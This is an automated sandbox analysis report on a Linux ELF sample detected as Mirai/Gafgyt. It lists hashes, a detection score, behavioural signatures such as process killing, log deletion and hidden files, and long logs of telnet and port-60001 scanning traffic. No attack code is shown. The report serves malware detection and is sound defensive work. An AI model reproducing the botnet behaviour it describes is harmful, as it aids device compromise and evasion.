Linux Analysis Report nSg5RM0w0d

Overview

General Information

Sample Name: nSg5RM0w0d
Analysis ID: 553468
MD5: 5ba84075b6789440e97cb6095ad55c32
SHA1: 19c16b64b5482561db39de26034459274b9dfb91
SHA256: 65222b0aa3c9aa64a92d8c4aa20e664ff6a7049c8b70dac73d85794407a32ded
Tags: 32elfmiraimotorola
Infos:

Detection

Gafgyt Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Sample has stripped symbol table
Sample tries to set the executable flag
Executes commands using a shell command-line interpreter

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: nSg5RM0w0d ReversingLabs: Detection: 55%

Bitcoin Miner:

barindex
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pulseaudio (PID: 5386) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5492) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5661) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5842) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5948) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 6019) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 6041) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35442 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36684 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36688 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36690 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36694 version: TLS 1.2

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 716 INFO TELNET access 124.114.140.102:23 -> 192.168.2.23:55138
Source: Traffic Snort IDS: 716 INFO TELNET access 124.114.140.102:23 -> 192.168.2.23:55186
Source: Traffic Snort IDS: 716 INFO TELNET access 124.114.140.102:23 -> 192.168.2.23:55280
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 188.247.187.146:23 -> 192.168.2.23:36002
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 188.247.187.146:23 -> 192.168.2.23:36002
Source: Traffic Snort IDS: 716 INFO TELNET access 124.114.140.102:23 -> 192.168.2.23:55296
Source: Traffic Snort IDS: 716 INFO TELNET access 41.180.146.95:23 -> 192.168.2.23:40958
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37668 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37668 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37668 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 50466 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39302 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39302 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39302 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 39302 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43564 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43564 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43564 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 33276 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37456 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37456 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 37456 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51214 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51214 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 52794 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51618 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43354 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51618 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51618 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35978 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 51618 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 56348 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35656 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 56348 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 56348 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 32850 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 53846 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 43140 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35206 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 35716 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 58528 -> 60001
Source: unknown Network traffic detected: HTTP traffic on port 48776 -> 60001
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 53.140.253.164:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 105.18.136.120:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 47.199.200.41:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 163.140.24.2:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 72.100.199.25:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 68.140.167.253:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 115.116.75.75:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 76.20.70.153:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 79.43.68.114:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 37.207.197.71:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 38.21.173.197:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 141.51.98.209:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 52.92.182.71:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 53.237.190.244:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 19.209.45.78:2323
Source: global traffic TCP traffic: 192.168.2.23:34070 -> 83.135.185.112:2323
Source: global traffic TCP traffic: 192.168.2.23:48182 -> 104.244.72.234:64938
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 221.253.101.114:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 80.139.20.113:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 179.133.22.101:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 71.92.241.20:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 34.202.11.64:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 75.146.12.114:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 52.111.50.136:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 66.249.56.80:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 129.148.253.155:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 64.69.111.65:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 136.62.58.84:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 91.196.92.30:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 199.1.26.53:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 179.7.133.205:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 50.57.32.114:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 196.37.4.82:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 182.240.115.147:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 104.157.2.41:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 72.139.192.159:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 113.41.82.81:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 116.168.10.136:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 203.175.139.20:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 117.81.190.31:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 98.92.252.192:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 146.5.55.152:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 222.214.46.234:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 154.113.81.142:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 59.22.167.61:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 67.240.160.66:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 42.15.69.126:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 218.127.75.251:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 44.79.77.229:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 38.175.214.91:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 209.247.77.95:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 193.0.48.180:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 164.155.157.111:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 91.7.92.129:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 183.223.49.164:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 101.40.149.218:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 191.156.228.136:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 133.218.252.29:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 198.46.140.234:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 82.125.79.157:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 122.159.93.94:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 4.107.241.45:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 35.111.1.254:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 54.253.96.220:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 184.207.18.5:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 118.136.82.156:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 114.127.114.252:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 67.249.211.161:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 124.172.4.16:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 124.180.219.133:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 104.48.213.54:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 97.253.81.174:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 82.157.184.117:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 183.74.229.95:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 195.15.150.79:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 154.245.111.9:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 104.20.23.89:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 169.150.29.242:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 137.173.179.25:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 125.190.197.192:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 209.54.79.72:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 187.152.109.126:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 165.17.162.69:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 77.160.157.62:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 119.115.223.243:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 37.157.13.62:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 47.87.41.215:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 135.74.100.27:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 97.125.9.11:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 149.43.19.21:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 129.220.67.4:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 114.107.138.185:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 152.62.163.72:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 121.101.226.122:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 162.172.24.204:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 222.24.224.54:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 141.162.57.187:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 118.8.148.22:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 166.16.135.196:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 152.250.207.34:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 23.236.26.230:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 85.247.181.104:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 133.98.166.233:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 74.208.31.9:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 20.127.201.152:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 194.250.248.90:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 87.221.211.81:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 77.11.105.244:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 110.196.71.213:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 54.235.34.214:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 164.34.2.113:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 112.101.44.163:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 109.132.142.101:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 105.107.224.107:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 131.126.43.123:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 112.106.78.103:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 117.19.251.194:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 92.121.123.23:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 40.60.150.103:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 32.63.131.9:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 60.71.28.213:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 80.200.28.234:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 107.149.30.29:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 72.131.251.232:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 206.239.117.251:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 9.60.181.219:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 139.132.128.75:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 189.136.46.221:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 134.222.111.200:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 90.135.7.219:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 2.137.190.155:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 146.84.100.182:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 130.156.239.43:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 170.30.151.233:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 125.212.53.222:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 109.102.43.12:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 143.64.142.93:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 83.71.172.238:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 195.235.187.116:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 83.85.154.66:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 71.237.172.91:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 202.231.159.4:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 123.244.142.184:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 31.124.201.150:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 160.216.8.178:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 95.111.16.172:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 142.228.82.1:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 63.194.106.55:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 46.142.39.218:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 195.225.82.4:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 193.250.115.161:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 222.65.89.102:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 37.206.128.235:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 151.61.87.96:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 114.69.15.239:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 210.46.123.184:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 170.218.249.168:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 131.138.85.106:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 66.101.58.138:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 130.14.122.190:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 208.2.189.79:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 180.231.149.210:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 190.22.240.126:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 98.125.105.227:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 86.254.67.251:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 57.115.164.247:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 130.63.17.80:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 221.245.29.210:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 76.56.12.56:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 20.123.168.198:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 141.235.45.227:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 42.139.62.201:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 20.39.226.39:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 195.12.158.100:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 204.44.219.139:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 140.185.162.36:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 174.125.122.106:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 95.90.94.159:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 223.210.238.167:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 44.167.16.105:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 167.82.185.56:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 222.219.220.204:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 146.20.76.140:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 169.242.22.74:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 57.19.193.18:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 138.34.1.61:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 31.228.86.178:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 42.44.164.156:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 206.208.57.225:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 179.210.171.132:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 96.185.5.245:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 73.58.115.193:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 169.127.66.117:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 179.41.110.76:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 18.239.164.48:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 110.233.190.57:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 9.91.26.196:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 81.75.13.127:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 79.244.238.232:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 37.63.49.70:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 24.160.233.177:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 34.213.51.225:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 189.168.12.149:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 167.80.90.66:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 118.18.141.36:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 18.25.252.137:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 4.204.155.119:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 87.37.151.48:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 195.208.254.64:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 177.65.107.208:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 94.75.198.108:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 115.75.158.120:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 123.143.60.178:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 208.200.160.84:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 147.69.145.3:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 71.218.172.97:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 12.100.118.13:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 80.53.187.76:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 137.146.155.94:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 146.62.112.75:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 119.232.206.197:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 218.28.228.4:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 36.135.154.54:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 81.35.97.185:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 161.181.223.130:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 149.231.185.161:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 44.75.131.194:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 66.61.152.144:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 114.210.245.101:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 83.18.245.207:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 93.112.202.71:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 220.254.20.205:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 38.207.46.249:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 223.34.207.3:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 139.213.143.103:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 124.165.17.200:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 93.149.110.153:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 85.153.76.168:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 104.158.254.151:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 176.45.108.176:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 80.189.185.227:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 187.180.48.43:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 134.43.34.123:60001
Source: global traffic TCP traffic: 192.168.2.23:34066 -> 165.93.100.67:60001
